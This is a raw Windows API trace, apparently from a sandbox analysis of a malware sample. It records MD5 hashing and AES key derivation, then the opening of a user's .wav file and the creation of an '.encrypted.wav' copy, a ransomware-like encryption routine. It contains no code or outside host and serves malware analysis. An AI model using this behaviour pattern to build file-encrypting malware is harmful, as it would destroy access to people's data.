CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0031.621] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.621] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.621] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.621] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.621] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.621] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.621] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.621] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.621] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.621] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.622] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.622] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.622] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0031.622] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.622] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.622] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.622] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.622] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.622] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.622] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.622] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.622] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.622] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.622] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.622] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.622] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.622] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.622] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.622] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.622] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.622] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.622] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.622] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0031.622] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.623] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.623] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.623] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.623] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0031.623] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.623] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.623] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.623] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.623] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.623] CryptHashData (hHash=0x7c2100, pbData=0x7c7768, dwDataLen=0x100, dwFlags=0x1) returned 1 [0031.623] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.623] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.623] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.623] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.623] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.623] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.623] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.623] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.623] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0031.623] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.623] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.623] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.623] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.623] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.624] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.624] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0031.624] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.624] CryptDestroyHash (hHash=0x7c2100) returned 1 [0031.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0031.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0031.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0031.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0031.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0031.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0031.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0031.624] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0031.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0031.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0031.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0031.624] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0031.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0031.624] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.624] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.624] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0031.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0031.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0031.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0031.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.624] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\xljsiuwe53rpslj_a.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.625] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.625] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0031.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0031.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0031.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0031.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0031.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0031.625] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0031.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0031.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0031.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0031.625] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0031.625] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0031.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0031.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0031.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0031.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0031.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0031.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0031.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0031.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0031.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0031.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0031.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0031.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0031.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0031.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0031.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0031.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791190 [0031.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0031.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0031.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0031.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0031.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791190 | out: hHeap=0x770000) returned 1 [0031.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0031.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0031.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0031.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0031.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0031.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0031.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0031.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0031.627] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k")) returned 0x10 [0031.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0031.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0031.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0031.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0031.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0031.627] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.encrypted.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\xljsiuwe53rpslj_a.encrypted.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0031.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0031.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0031.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0031.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0031.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0031.628] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0031.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0031.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0031.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0031.628] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0031.628] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0031.628] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0031.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0031.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0031.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 